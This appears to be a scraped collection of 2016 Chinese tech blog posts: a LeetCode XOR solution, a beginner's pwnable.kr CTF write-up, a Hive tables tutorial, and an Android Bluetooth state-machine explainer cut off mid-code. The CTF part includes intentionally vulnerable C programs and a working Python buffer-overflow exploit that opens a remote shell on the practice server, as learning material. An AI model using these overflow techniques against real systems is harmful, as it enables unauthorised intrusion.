【leetcode77】Single Number

July 31, 2016, 12:15 am

题目描述：

给定一个数组，只有一个数字出现两次，判断那个数字

思路：

不断取出数据进行异或，最后一个数字，因为相同的数字会抵消

代码：

public class Solution {
    public int singleNumber(int[] nums) {
         int left = nums[0];  
     for(int i =1; i< nums.length; i++)  
      {  
        left = left ^ nums[i];  
      }  
      return left;  
    }
}

欢迎关注《IT面试题汇总》微信订阅号。每天推送经典面试题和面试心得技巧，都是干货！

微信订阅号二维码如下：

这里写图片描述

作者：u010321471 发表于2016/7/31 0:15:39 原文链接

阅读：74 评论：0 查看评论

↧

通过pwnable.kr从零学pwn

July 31, 2016, 12:17 am

≫ Next: 理解Hive表（Hive Table）

≪ Previous: 【leetcode77】Single Number

本文链接：http://blog.csdn.net/u012763794/article/details/51992512

下面的这个地址很多ctf的学习资源都是有推荐的

挑战地址：http://pwnable.kr/play.php

更多题目的题解可以看这，我的看学习进度更新吧

http://rickgray.me/2015/07/24/toddler-s-bottle-writeup-pwnable-kr.html

fd

首先不用说给了就直接连上去

看一下代码

重要函数：read

ssize_t read(int fd,void * buf ,size_t count);
函数说明
read()会把参数fd 所指的文件传送count个字节到buf指针所指的内存中。若参数count为0，则read()不会有作用并返回0。返回值为实际读取到的字节数，如果返回0，表示已到达文件尾或是无可读取的数据，此外文件读写位置会随读取到的字节移动。

还有一个就是linux的文件描述符

Integer value	Name	<unistd.h> symbolic constant^[1]	<stdio.h> file stream^[2]
0	Standard input	STDIN_FILENO	stdin
1	Standard output	STDOUT_FILENO	stdout
2	Standard error	STDERR_FILENO	stderr

那么我们只要控制了fd的值为标准输入，那么buf的值就可以用我们的键盘输入了，

目标是使fd为0，那么我们传进去的第一个参数就是0x1234，即十进制的4660

成功get flag

collision

这个也是直接给代码了，先看看代码吧

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
        int* ip = (int*)p;
        int i;
        int res=0;
        for(i=0; i<5; i++){
                res += ip[i];
        }
        return res;
}

int main(int argc, char* argv[]){
        if(argc<2){
                printf("usage : %s [passcode]\n", argv[0]);
                return 0;
        }
        if(strlen(argv[1]) != 20){
                printf("passcode length should be 20 bytes\n");
                return 0;
        }

        if(hashcode == check_password( argv[1] )){
                system("/bin/cat flag");
                return 0;
        }
        else
                printf("wrong passcode.\n");
        return 0;
}

首先要有一个命令行参数，而且长度必须为20

跟着在check_password里面强制转化为int指针，char占用1位，int4位，那么转化后就是5个数组了，跟那个for循环也是吻合的，那么就是说

也就是char转化为int后加起来要等于那个十六进制串

我们随便减一下就好了，看看哪5个加起来等于他就行了

这个还要是小端模式

bof

代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

只要覆盖key的值为0xcafebabe就可以了

用ida打开发现overflowme的基址为ebp-0x2c，即44个字节，再加上ebp和返回地址的8个字节就是52个字节，最后的4个字节覆盖就可以了

那么最终的利用代码为

# -*-coding:utf8 -*-
import socket
import telnetlib
import struct

# 将32位的整数转化为字符串（小端模式）
def p32(val):
	# <：小端模式  L:unsigned long
	return struct.pack("<L", val)

def pwn():
	# 创建一个TCP socket
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	# 连接服务器的9000端口(接收的参数是一个元组)
	s.connect(("pwnable.kr",9000))
	# 目标被填充的地址
	target_addr = p32(0xcafebabe)

	# 构造payload
	payload = 'A' * 52 + target_addr

	# 向服务器发送数据
	s.sendall(payload + '\n')
	# 创建一个telnet来产生一个控制服务器的shell
	t = telnetlib.Telnet() 
	t.sock = s
	t.interact()

pwn()

flag

题目说是逆向任务，linux64位的elf，别人说加了壳，从ida可以看到，我终于从hex看到了

当然直接notepad++什么的搜索一下， linux有壳的话一般是upx吧，linux一般开源，不需要加壳什么的吧，除了安卓

那么直接 upx -d 解一下，再用ida打开看到了flag

点过去

提交不对，这个只是注释，可能有些字符不可见或者被空格截断了

再用notepad++搜索一下UPX 果然

passcode

这个难道跨度对于我来说有点大，先看看源码

#include <stdio.h>
#include <stdlib.h>

void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1);
        fflush(stdin);

        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

先熟悉一下汇编代码吧，反正初学嘛

下面我们可以看到scanf有写取地址符&和没写的区别，有写就是用lea指令，再入栈（最终是栈的地址入栈），没写就直接入栈了（最终是栈地址上对应的值入栈了）

Dump of assembler code for function main:
   0x08048665 <+0>:     push   %ebp
   0x08048666 <+1>:     mov    %esp,%ebp
   0x08048668 <+3>:     and    $0xfffffff0,%esp
   0x0804866b <+6>:     sub    $0x10,%esp
   0x0804866e <+9>:     movl   $0x80487f0,(%esp)   ;"Toddler's Secure Login System 1.0 beta.\n"入栈
   0x08048675 <+16>:    call   0x8048450 <puts@plt> ;调用put函数
   0x0804867a <+21>:    call   0x8048609 <welcome> ; 调用welcome函数
   0x0804867f <+26>:    call   0x8048564 <login> ;调用login函数
   0x08048684 <+31>:    movl   $0x8048818,(%esp) ;"Now I can safely trust you that you have credential :)"  入栈
   0x0804868b <+38>:    call   0x8048450 <puts@plt> ;调用put函数
   0x08048690 <+43>:    mov    $0x0,%eax  ;返回值为0 
   0x08048695 <+48>:    leave ;相当于 mov %ebp,%esp  pop ebp 这两条指令，用来平衡堆栈
   0x08048696 <+49>:    ret   ;返回
End of assembler dump.


Dump of assembler code for function welcome:
   0x08048609 <+0>:     push   %ebp
   0x0804860a <+1>:     mov    %esp,%ebp
   0x0804860c <+3>:     sub    $0x88,%esp
   0x08048612 <+9>:     mov    %gs:0x14,%eax
   0x08048618 <+15>:    mov    %eax,-0xc(%ebp)
   0x0804861b <+18>:    xor    %eax,%eax
   0x0804861d <+20>:    mov    $0x80487cb,%eax  ;"enter you name : "
   0x08048622 <+25>:    mov    %eax,(%esp)      ;入栈
   0x08048625 <+28>:    call   0x8048420 <printf@plt> ;printf输出
   0x0804862a <+33>:    mov    $0x80487dd,%eax  ;"%100s"的地址
   0x0804862f <+38>:    lea    -0x70(%ebp),%edx ;name局部变量地址
   0x08048632 <+41>:    mov    %edx,0x4(%esp) ;name入栈
   0x08048636 <+45>:    mov    %eax,(%esp) ;"%100s"的地址入栈
   0x08048639 <+48>:    call   0x80484a0 <__isoc99_scanf@plt> ;调用scanf函数
   0x0804863e <+53>:    mov    $0x80487e3,%eax ;"Welcome %s!\n"字符串地址
   0x08048643 <+58>:    lea    -0x70(%ebp),%edx ;name的首地址
   0x08048646 <+61>:    mov    %edx,0x4(%esp)   ;name首地址入栈
   0x0804864a <+65>:    mov    %eax,(%esp)      ;"Welcome %s!\n"字符串入栈
   0x0804864d <+68>:    call   0x8048420 <printf@plt> ;调用printf函数
   0x08048652 <+73>:    mov    -0xc(%ebp),%eax 
   0x08048655 <+76>:    xor    %gs:0x14,%eax      ;这个应该是跟前面的相对应的吧，暂时不懂什么意思，根据下面的判断应该是跟栈相关的，难道也是堆栈平衡？
   0x0804865c <+83>:    je     0x8048663 <welcome+90>
   0x0804865e <+85>:    call   0x8048440 <__stack_chk_fail@plt>
   0x08048663 <+90>:    leave
   0x08048664 <+91>:    ret
End of assembler dump.

Dump of assembler code for function login:
   0x08048564 <+0>:  push   %ebp
   0x08048565 <+1>:  mov    %esp,%ebp
   0x08048567 <+3>:  sub    $0x28,%esp
   0x0804856a <+6>:  mov    $0x8048770,%eax ;"enter passcode1 : "地址
   0x0804856f <+11>: mov    %eax,(%esp) ;入栈
   0x08048572 <+14>: call   0x8048420 <printf@plt> ;调用printf
   0x08048577 <+19>: mov    $0x8048783,%eax ;"%d"的地址
   0x0804857c <+24>: mov    -0x10(%ebp),%edx ;passcode1
   0x0804857f <+27>: mov    %edx,0x4(%esp) ;这里就是问题，把栈上储存的内容入栈了，而不是把栈的地址入栈
   0x08048583 <+31>: mov    %eax,(%esp) ;"%d"的地址入栈
   0x08048586 <+34>: call   0x80484a0 <__isoc99_scanf@plt> ;调用scanf
   0x0804858b <+39>: mov    0x804a02c,%eax ;stdin入栈
   0x08048590 <+44>: mov    %eax,(%esp)
   0x08048593 <+47>: call   0x8048430 <fflush@plt> ;fflush(stdin):刷新标准输入缓冲区，把输入缓冲区里的东西丢弃
   0x08048598 <+52>: mov    $0x8048786,%eax  ;"enter passcode2 : "
   0x0804859d <+57>: mov    %eax,(%esp) ;入栈
   0x080485a0 <+60>: call   0x8048420 <printf@plt> 
   0x080485a5 <+65>: mov    $0x8048783,%eax ;"%d"
   0x080485aa <+70>: mov    -0xc(%ebp),%edx ;passcode2
   0x080485ad <+73>: mov    %edx,0x4(%esp) ;这里就是问题，把栈上储存的内容入栈了，而不是把栈的地址入栈
   0x080485b1 <+77>: mov    %eax,(%esp) ;"%d"入栈
   0x080485b4 <+80>: call   0x80484a0 <__isoc99_scanf@plt>
   0x080485b9 <+85>: movl   $0x8048799,(%esp)  ;"checking..."
   0x080485c0 <+92>: call   0x8048450 <puts@plt> ;输出
   0x080485c5 <+97>: cmpl   $0x528e6,-0x10(%ebp) ;passcode1与0x528e6相比
   0x080485cc <+104>:   jne    0x80485f1 <login+141> ;不等就跳到登陆失败
   0x080485ce <+106>:   cmpl   $0xcc07c9,-0xc(%ebp) ;passcode2与0xcc07c9相比
   0x080485d5 <+113>:   jne    0x80485f1 <login+141> ;不等也是跳到登陆失败
   0x080485d7 <+115>:   movl   $0x80487a5,(%esp) ;"Login OK!"
   0x080485de <+122>:   call   0x8048450 <puts@plt>
   0x080485e3 <+127>:   movl   $0x80487af,(%esp) ;"/bin/cat flag"
   0x080485ea <+134>:   call   0x8048460 <system@plt>
   0x080485ef <+139>:   leave  ;平衡堆栈
   0x080485f0 <+140>:   ret    
   0x080485f1 <+141>:   movl   $0x80487bd,(%esp) ;"Login Failed!"
   0x080485f8 <+148>:   call   0x8048450 <puts@plt>
   0x080485fd <+153>:   movl   $0x0,(%esp)
   0x08048604 <+160>:   call   0x8048480 <exit@plt>
End of assembler dump.

通过代码发现，name基址在ebp-0x70，退出welcome函数后login的栈的基本结构跟welcome一致,ebp-0x10, 那么相差0x70-0x10=0x60，即96个地址，那么我们覆盖96个后的地址就可以对passcode1的值进行控制，再加上scanf函数，就可以对任意的四字节的地址进行写操作，

本文链接：http://blog.csdn.net/u012763794/article/details/51992512

作者：u012763794 发表于2016/7/31 0:17:50 原文链接

阅读：19 评论：0 查看评论

↧

理解Hive表（Hive Table）

July 31, 2016, 12:22 am

≫ Next: 蓝牙之三-StateMachine

≪ Previous: 通过pwnable.kr从零学pwn

Hive表逻辑上有表的数据和相关的元数据组成。元数据描述表的结构，索引等信息。数据通常存放在HDFS中，虽然任意的Hadoop文件系统都能支持，例如Amazon的S3或者而本地文件系统。元数据则存在关系型数据库中，嵌入式的默认使用Derby，MySQL是一种很常用的方案。

许多关系型数据库都提供了命名空间的概念，用于划分不同的数据库或者Schema。例如MySQL支持的Database概念，PostgreSQL支持的namespace概念。Hive同样提供了这种逻辑划分功能，相关的语句包括：

CREATE DATABASE dbname;
USE dbname;
DROP DATABASE dbname;

表的全称可以通过dbname.tablename来访问，如果没有指定dbname，默认为default。show databases和show tables命令可用于查看数据库以及数据库中的表。

image_1aou0pbctok3t9trtu5v4949.png-14.1kB

1. 内部表与外部表

在Hive中创建表的时候，默认情况下Hive将会管理表的数据，也就是将数据移动到对应的warehouse目录下。也可以创建 外部表，告诉Hive将表指向warehouse目录外的数据。

这两种类型的不同首先表现在LOAD和DROP语句的行为上。考虑下面的语句：

CREATE TABLE managed_table(dummy ,STRING);
LOAD DATA INPATH '/user/root/data.txt' INTO table managed_table;

上述语句会将hdfs://user/root/data.txt移动到Hive的对应目录hdfs://user/hive/warehouse/managed_table 。载入数据的速度非常快，因此Hive只是把数据移动到对应的目录，不会对数据是否符合定义的Schema做校验，这个工作通常在读取的时候进行，成为Schema On Read。

数据表使用DROP语句删除后，其数据和表的元数据都被删除，不再存在，这就是Hive Managed的意思。

DROP TABLE managed_table;

外部表则不一样，数据的创建和删除完全由自己控制，Hive不管理这些数据。数据的位置在CREATE时指定：

CREATE EXTERNAL TABLE external_table (dummy,STRING)
    LOCATION '/user/root/external_table';

LOAD DATA INPATH '/user/root/data.txt' INTO TABLE external_table;

指定EXTERNAL关键字后，Hive不会把数据移动到warehouse目录中。事实上，Hive甚至不会校验外部表的目录是否存在。这使得我们可以在创建表格之后再创建数据。当删除外部表时，Hive只删除元数据，而外部数据不动。

选择内部表还是外部表？大多数情况下，这两者的区别不是很明显。如果数据的所有处理都在Hive中进行，那么更倾向于选择内部表。但是如果Hive和其他工具针对相同的数据集做处理，外部表更合适。一种常见的模式是使用外部表访问存储的HDFS（通常由其他工具创建）中的初始数据，然后使用Hive转换数据并将其结果放在内部表中。相反，外部表可以用于将Hive的处理结果导出供其他应用使用。使用外部表的另一种场景是针对一个数据集，关联多个Schema。

2. 分区与Buckets

Hive将表划分为分区，Partition根据分区字段进行。分区可以让数据的部分查询变得更快。表或者分区可以进一步被划分为buckets，bucket通常在原始数据中加入一些额外的结构，这些结构可以用于高效查询。例如，基于用户id的分桶可以使用基于用户的查询非常快。

分区

假设日志数据中，每条记录都带有时间戳。如果根据时间来分区，那么同一天的数据将被划分到同一个Partition中。针对每一天或者某几天数据的查询将会变得很高效，因为只需要扫描对应分区中的文件。分区并不会导致跨度大的查询变得低效。

分区可以通过多个维度来进行。例如通过日期划分之后，我们可以根据国家进一步划分。

分区在创建表的时候定义，使用 PARTITIONED BY从句，该从句接受一个字段列表：

CREATE TABLE logs (ts BIGINT , line STRING)
PARTITIONED BY (dt STRING,country STRING);

当导入数据到分区表时，分区的值被显式指定：

LOAD DATA INPATH '/user/root/path'
INTO TABLE logs
PARTITION (dt='2001-01-01',country='GB');

在文件系统上，分区作为表目录的下一级目录存在：

image_1aou2bjgo197s63vrfl12jg106dm.png-43.6kB

SHOW PARTITION命令可以显示表的分区：

hive> SHOW PARTITIONS logs;

image_1aou2f2hq1epk60tvfn1c631bmu13.png-33.5kB

虽然我们将用于分区的字段成为分区字段，但是在数据文件中，不存在这些字段的值，这些值是从目录中推断出来的。但是在SELECT语句中，我们依然可使用分区字段：

SELECT ts , dt , line
FROM logs
WHERE country='GB'

这个语句智慧扫描file1，file2以及file4.返回的dt字段由Hive从目录名提取，而不是数据文件。

Bucket

在表或者分区中使用Bucket通常有2个原因，一是为了高效查询。Bucket在表中加入了特殊的结果，Hive在查询的时候可以利用这些结构提高效率。例如，如果两个表根据相同的字段进行分桶，则在对这两个表进行关联的时候，可以使用map-side关联高效实现，前提是关联的字段在分桶字段中出现。第二个原因是可以高效地进行抽样。在分析大数据集时，经常需要对部分抽样数据进行观察和分析，Bucket有利于高效实现抽样。

为了让Hive对表进行分桶，我们通过CLUSTER BY从句在创建表的时候指定：

CREATE TABLE bucketed_users(id INT, name STRING)
CLUSTERED BY (id) INTO 4 BUCKETS;

我们指定表根据id字段进行分桶，并且分为4个桶。分桶时Hive根据字段哈希后取余数来决定数据应该放在哪个痛，因此每个桶都是整体数据的随机抽样。

在map-side的关联中，两个表根据相同的字段进行分桶，因此处理左边表的bucket时，可以直接从外表对应的bucket中提取数据进行关联操作。map-side关联的两个表不一定需要完全相同的Bucket数量，只要是倍数即可。进一步信息请参考Map关联.

在一个Bucket内部，数据可以根据一个或者多个字段进行排序，这可以进一步提高map-side关联的效率，此时关联操作变成了一个合并排序（merge sort），下面的语句展示桶内排序：

CREATE TABLE bucketed_users(id INT,name STRING)
CLUSTERED BY (id) SORTED BY (id ASC) INTO 4 BUCKETS;

需要注意的是，Hive并不会对数据是否满足表定义中的分桶进行校验，只有在查询的时候，出现异常才会给出错误。因此一种更好的方式是将分桶的工作交给Hive来完成，假设我们有如下未分桶的数据：

hive> create table users(id INR , name STRING);

hive> insert into users values (0,'Nat'),(2,'Joe'),(3,'Kay'),(4,'Ann');


hive> SELECT * FROM users;
0 Nat
2 Joe
3 Kay
4 Ann

image_1aou3tguk1ne9m5b63u4k9ssr9.png-70.1kB

为了把这些数据填入到分桶的表中，我们需要设置hive.enforce.bucketing属性为true:

hive> set hive.enforce.bucketing = true;

在Hive 2.x 版本中，无需设置这个属性。

然后使用下面的语句插入数据：

INSERT OVERWRITE TABLE bucketed_users
SELECT * FROM users;

在物理存储上，每个Bucket对应表或者分区目录下的一个文件。事实上，这些文件是MapReduce的输出文件，文件的数量与Reducer数量一致。查看HDFS的文件结构我们可以证实这一点，4个文件对应我们指定的4个Bucket。

image_1aou4k5fs19edpmg10ba1ui21vj3m.png-25.5kB

在查看一下文件的内容，可以看到id为0和4放在bucket0中，而bucket1则没有数据，id为2的数据放在bucket2中;

image_1aou4sa9egch1m43cm11k3unk813.png-29.7kB

我们对表进行抽样,结果是一致的：

select * from bucketed_users 
tablesample(bucket 1 out of 4 on id);

image_1aou50h3k1c2l11po16ki1gis73s1g.png-8.8kB

注意这里的bucket数是从1开始，跟文件中的0不一样。通过指定bucket的比例，women可以抽样想要的数据，例如下面的语句返回一半bucket（即2个bucket）的数据：

select * from bucketed_users
tablesample(bucket 1 out of 2 on id)

image_1aou5861t156m1t14bmnsvq115t1t.png-11.5kB

对分桶的表进行采样是很高效的，因为只需要扫描符合tablesample从句的bucket，使用随机函数抽样则不一样，需要对全表进行扫描：

select * from bucketed_users
tablesample(bucket 1 out of 4 on rand());

3. 存储格式

Hive中表存储的格式通常包括2个方面：行格式（row format)和文件格式（file format)。
行格式描述行和行中的字段如果被存储。在Hive中，行格式通过SerDe来定义，SerDe代表序列化和反序列化。当查询表数据时，SerDe扮演反序列化的角色，将文件中行的字节数据反序列化为对象。当进行数据插入的时候，将数据序列化为行的字节格式，写入到文件中。

file format则侧重于描述一行中字段的容器格式，最简单的格式是纯文本文件，面向行和面向列的二进制格式也可用。

3.1 默认存储格式：字段分隔的文本

当创建表时，如果没有指定ROW FORAMT或者STORED AS从句，Hive默认使用分隔字段的文本格式，每行对应一条记录。每一行数据中，字段的分隔符为CTRL+A。在数据或者STRUCT等数据类型中，元素之间采用CTRL+B分隔，即分隔数组元素，STRUCT的名值对或者Map的键值对。Map的键和值之间采用CTRL+C分隔。行与行之间采用换行符分隔。总结如下表：

分隔对象	分隔符	描述
行内字段	CTRL+A
容器类型的条目	CTRL+B
Map的Key和Value	CTRL+C
行与行	换行符

需要注意的是，上述的分隔符只是针对通常的数据类型。在嵌套的复杂类型中，则根据嵌套结构的不同，采用不同的分隔符，具体参考Hive文档。

所以，默认情况下的CREATE语句：

CREATE TABLE ...;

等同于：

CREATE TABLE ...
ROW FORMAT DELIMITED
  FIELDS TERMINATED BY '\001'
  COLLECTION ITEMS TERMINATED BY '\002'
  MAP KEYS TERMINATED BY '\003'
  LINE TERMINATED BY '\n'
STORED AS TEXTFILE

在内部，Hive使用LazySimpleSerDe作为操作对象，与MapReduce中的文本输入输出协同工作。

文本形式的文件方便其他工具对浙西而数据进行处理，例如MapReduce和Straming。同时Hive提供了更加紧凑和高效的结构。

3.2 二进制格式：

要使用二进制格式，在创建表的时候指定STORED AS从句，不需要指定ROW FORMAT，因为行的格式完全由对应的二进制文件控制。

二进制的存储格式可以分为两类：面向行和面向列。如果查询只需要用到部分列，面向列的格式比较合适。如果需要处理的是行中的大部分数据，则面向行的格式是更好的选择。

Hive原生支持的面向行的格式有Avro数据文件和SequenceFile。这两种格式都是通用的，可切分的，可压缩的格式。Avro还支持模式解析和多种语言的绑定。下面语句使用压缩的Avro作为存储格式：

SET hive.exec.compress.output=true;
SET avro.output.codec=snappy;
CREATE TABLE ... 
STORED AS AVRO;

STORED AS SEQUENCEFILE指定使用序列文件作为存储。

Hive原生支持的面向列的存储格式有Parquet，RCFile和ORCFile。下面的语句使用Parquet作为存储：

CREATE TABLE users_parquet 
STORED AS PARQUET
AS
SELECT * FROM users;

3.3 使用自定义的SerDe

可以在创建表的时候指定自定义的序列化机制，例如下面的语句使用基于正则表达式的SerDe来处理数据的读写：

CREATE TABLE stations ( usaf STRING, wban STRING , name STRING)
ROW FORMAT SERDE 'org.apache.hadoop.hive.contrib.serde2.RegexSerDe'
WITH SERDEPROPERTIES(
  "input.regex"="(\\d{6}) (\\d{5}) (.{29}) .*"
)

ROW FORMAR SERDE指定使用SerDe，SERDEPROPERTIES指定相关的属性。
将下面格式的数据导入到表中：

LOAD DATA INPATH "/input/ncdc/metadata/stations-fixed-width.txt"
INTO TABLE stations;

image_1aou7pab214ki6fhcv11lug1s0i2a.png-64.6kB

再次从表中读取数据时，将根据SerDe反序列化数据，得到如下结果：

image_1aou83k4516m7dh1sm21c5e17im2n.png-15.7kB

实际存储的还是相同的数据，但是解析出来是，只有我们定义的三个字段的数据。warehouse目录下的数据如下：

image_1aou884r31hds1gm11aqk1itb1eo934.png-39kB

3.4 存储处理器（Storage Handler）

Storage Handler用于访问Hive无法直接访问的存储，例如HBase。通过STORED BY从句指定，而不是ROW FORMAT和STORED AS。更多Storage Handler的信息，参考Hive Wiki。

4. 导入数据

LOAD DATA通过移动或者复制文件到表对应的目录中。我们也可以从一张表中查询出数据后插入到另一张Hive表，或者使用CREATE TABLE AS SELECT创建表。如果要从关系型数据看导入数据，考虑使用Sqoop之类的工具。

4.1 INSERT

下面是一个插入的例子：

INSERT OVERWRITE TABLE target
SELECT col1 ,col2
FROM source

对于分区的表，插入的时候可以指定分区：

INSERT OVERWRITE TABLE target
PARTITION(dt='2010-01-01')
SELECT col1 ,col2
FROM source;

OVERWRITE关键字表示覆盖表中或者分区中的原有数据。INSERT INTO则追加数据不覆盖。分区也可以动态指定，成为动态分区插入：

INSERT INTO TABLE target
PARTITION(dt)
SELECT col1,col2,dt
FROM source

也可以使用VALUES插入记录：

INSERT INTO users values( 1,'name'),(2,'name');

4.2 多表插入

Hive支持下面的插入语句：

FROM source 
INSERT OVERWRITE TABLE target
  SELECT col1,col2;

这种语法在从一个数据源提取数据，并插入到多张表的时候很有用：

FROM records
INSERT INTO TABLE stations_by_year
  SELECT year ,COUNT(DISTINCT station)
  GROUP BY year
INSERT INTO TABLE record_by_year
  SELECT year,count(1)
  GROUP BY year
INSERT INTO TABLE good_records_by_year
  SELECT year , count(1)
  WHERE temperature != 9999 AND quality in (0,1,4,5,9)
  GROUP BY year;

4.3 Create Table … as Select

CTAS用于将查询结果直接插入到另外一张新建的表。新表的Schema从查询结果中推断。

CREATE TABLE target
AS 
SELECT col1,col2
FROM source;

CTAS操作是原子的，如果SELECT失败，则表不会创建。

5. 修改表

Hive的Schema On Read使得修改表结构很容易。使用ALTER TABLE修改表结构，修改表名的语句如下：

ALTER TABLE source RENAME TO target;

和MySQL的语法几乎一样。如果是内部表，则相应的数据文件被重命名，外部表则只修改元数据。

下面的语句添加一列：

ALTER TABLE source ADD COLUMNS (col3 STRING);

修改列的名称或类型也类似SQL的语法，只要旧的数据类型可以被解释为新的数据类型，更多语法参考Hive手册。

6. 删除表

DROP TABLE语句删除表的数据和元数据。对于外部表，只删除metastore中的元数据，而外部数据保存不动。

如果只想删除表数据，保留表结构，跟MySQL类似，使用TRUNCATE语句:

TRUNCATE TABLE my_table;

这个语句只针对内部表，如果要删除外部表的数据，在Hive Shell中使用 dfs -rmr命令，该命令直接删除外部表的目录。

如果要创建一个跟现有表结构一样的空表，也跟MySQL类似使用LIKE关键字：

CREATE TABLE new_table LIKE existing_table;

作者：bingduanlbd 发表于2016/7/31 0:22:19 原文链接

阅读：20 评论：0 查看评论

↧

蓝牙之三-StateMachine

July 31, 2016, 12:24 am

≫ Next: Apache Spark 2.0正式版发布

≪ Previous: 理解Hive表（Hive Table）

蓝牙和wifi的管理上都使用到了状态机。

该状态机属于分层状态机管理消息。一个状态对应于一个<State>对象，并且状态必须实现<processMessage>方法，可选的实现方法是<enter/exit/getName>，<enter/exit>方法对应于构造和析构函数，它们被用于初始化和清理状态。<getName>方法返回状态的名称，缺省的方式是返回返回类名称，但是也许返回实例的名称是使用者更想要的方式，尤其是一个状态类具有多个实例的时候。

当状态机使用创建后，<addState>方法用于创建状态层次，<setInitialState>用于标识哪些是初始的状态。构造完成后程序调用<start>方法用于初始化和启动状态机。状态机的第一个动作是为所有的状态层次（从最原始的父类开始）调用<enter>方法。这在处理任何消息之前完成。如下的mP1.enter将唤醒mS1.enter。最中发送该状态的的信息被当前状态处理，也就是被<mS1.processMessage>方法。

     mP1
      /   \
 mS2   mS1 ----> initial state

在状态机被创建和启动后，消息的创建方法是<obtainMessage>，消息的发送方法是<sendMessage>。当状态机接收到一个消息时，当前状态的<processMessage>方法将被调用，在上面的例子中，mS1.processMessage将被首先唤醒，该状态可使用<transitionTo>方法将当前状态切换到一个新状态。

状态机中的每个状态可以有零或一个父状态，如果子状态无法处理一个消息，父状态将返回fase或者NOT_HANDLED代为处理。如果一个消息从没被处理，则<unhandledMessage>方法被调用作为消息处理的最后机会。

当状态机完成所有的处理后也许会调用<transitionToHaltingState>。当<processingMessage>返回时，状态机将会会处于<HaltfingState>并且调用<halting>方法。任何后续发给状态机的消息将会唤醒<haltedProcessMessage>方法。

如果要完全停止状态机<quit>或者<quitNow>方法将被调用。这将进一步调用当前状态和父状态的<exit>方法，调用<onQuiting>然后退出线程。

由于状态按层级方式组织，一个状态的进入将引起一个状态的退出。

状态可能使用到的另外两个方法是<deferMessage>和<sendMessageAtFrontOfQueue>。<sendMessageAtFrontOfQueue>将消息放在stack队列的前端而非尾端。<deferMessage>将信息保存在一个list上直到新状态切换，这时所有deferred 消息将被放大状态机队列的首端，最早消息放在最前端。然后这些消息将被当前状态在其它任何消息前被处理。

以8个状态的状态机说明上述过程。

         mP0
        /   \
       mP1   mS0
       /   \
     mS2   mS1
    /  \    \
    mS3  mS4  mS5  ---> initial state

在启动mS5后，处于激活状态的state是mP0，mP1,mS1,mS5。所以当一个消息来临是，processMessage处理消息的过程是mS5,mS1,mP1,mP0，如果哪个状态返回false或者NOT_HANDLED则就会用父状态处理方法。

假设mS5接收的消息，其能够处理，并且处理过程确认需要切换状态，其将会调用transitionTo(mS4)并且返回ture或者HANDLED。状态机从processMessage返回后立即知道它们的共同父状态是mP1.其将会调用mS5.exit，mS1.exit，mS2.enter以及mS4.enter。新的激活状态的state是mP0,mP1,mS2,mS4。所以当下一个消息来临时mS4.processMessage将被唤醒。

如下是一个hello world实例。

class HelloWorld extends StateMachine {
   HelloWorld(String name) {
        super(name);
        addState(mState1);
        setInitialState(mState1);
    }

    public static HelloWorld makeHelloWorld() {
        HelloWorld hw = new HelloWorld("hw");
        hw.start();
        return hw;
    }

    class State1 extends State {
        @Override public boolean processMessage(Message message) {
            log("Hello World");
            return HANDLED;
            }
    }
    State1 mState1 = new State1();
}

void testHelloWorld() {
    HelloWorld hw = makeHelloWorld();
    hw.sendMessage(hw.obtainMessage());
}

在蓝牙的BondStateMachine.java中就用到了状态机。

final class BondStateMachine extends StateMachine {
...
//这里定义了private的构造函数，不能通过new方法创建BondStateMachine的对象。
private BondStateMachine(AdapterService service,
            AdapterProperties prop, RemoteDevices remoteDevices) {
        super("BondStateMachine:");
        addState(mStableState);
        addState(mPendingCommandState);
        mRemoteDevices = remoteDevices;
        mAdapterService = service;
        mAdapterProperties = prop;
        mAdapter = BluetoothAdapter.getDefaultAdapter();
        setInitialState(mStableState);
    }
//public方法，通过make方法创建该对象
    public static BondStateMachine make(AdapterService service,
            AdapterProperties prop, RemoteDevices remoteDevices) {
        Log.d(TAG, "make");
        BondStateMachine bsm = new BondStateMachine(service, prop, remoteDevices);
        bsm.start();
        return bsm;
    }

...
 private class StableState extends State {
        @Override
        public void enter() {
            infoLog("StableState(): Entering Off State");
        }

        @Override
        public boolean processMessage(Message msg) {

            BluetoothDevice dev = (BluetoothDevice)msg.obj;

            switch(msg.what) {

              case CREATE_BOND:
                  createBond(dev, msg.arg1, true);
                  break;
              case REMOVE_BOND:
                  removeBond(dev, true);
                  break;
              case BONDING_STATE_CHANGE:
                int newState = msg.arg1;
                /* if incoming pairing, transition to pending state */
                if (newState == BluetoothDevice.BOND_BONDING)
                {
                    sendIntent(dev, newState, 0);
                    transitionTo(mPendingCommandState);
                }
                else if (newState == BluetoothDevice.BOND_NONE)
                {
                    /* if the link key was deleted by the stack */
                    sendIntent(dev, newState, 0);
                }
                else
                {
                    Log.e(TAG, "In stable state, received invalid newState: " + newState);
                }
                break;

              case CANCEL_BOND:
              default:
                   Log.e(TAG, "Received unhandled state: " + msg.what);
                   return false;
            }
            return true;
        }
    }


    private class PendingCommandState extends State {
        private final ArrayList<BluetoothDevice> mDevices =
            new ArrayList<BluetoothDevice>();

        @Override
        public void enter() {
            infoLog("Entering PendingCommandState State");
            BluetoothDevice dev = (BluetoothDevice)getCurrentMessage().obj;
        }

        @Override
        public boolean processMessage(Message msg) {

            BluetoothDevice dev = (BluetoothDevice)msg.obj;
            DeviceProperties devProp = mRemoteDevices.getDeviceProperties(dev);
            boolean result = false;
             if (mDevices.contains(dev) && msg.what != CANCEL_BOND &&
                   msg.what != BONDING_STATE_CHANGE && msg.what != SSP_REQUEST &&
